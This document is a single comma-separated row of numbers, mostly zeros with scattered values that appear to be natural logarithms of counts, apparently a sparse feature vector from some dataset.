0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 2.833213344056216, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0, 0.0, 5.8066078281957605, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 3.4825185607408002, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.101797476893978, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 3.800574088041945, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 4.442651256490317, 0, 0.0, 2.302585092994046, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 7.275172319452771, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.952096120109145, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.343805421853684, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 3.178053830347946, 0, 0, 0.0, 0, 0.0, 4.0943445622221, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.1354942159291497, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.330733340286331, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.375278407684165, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 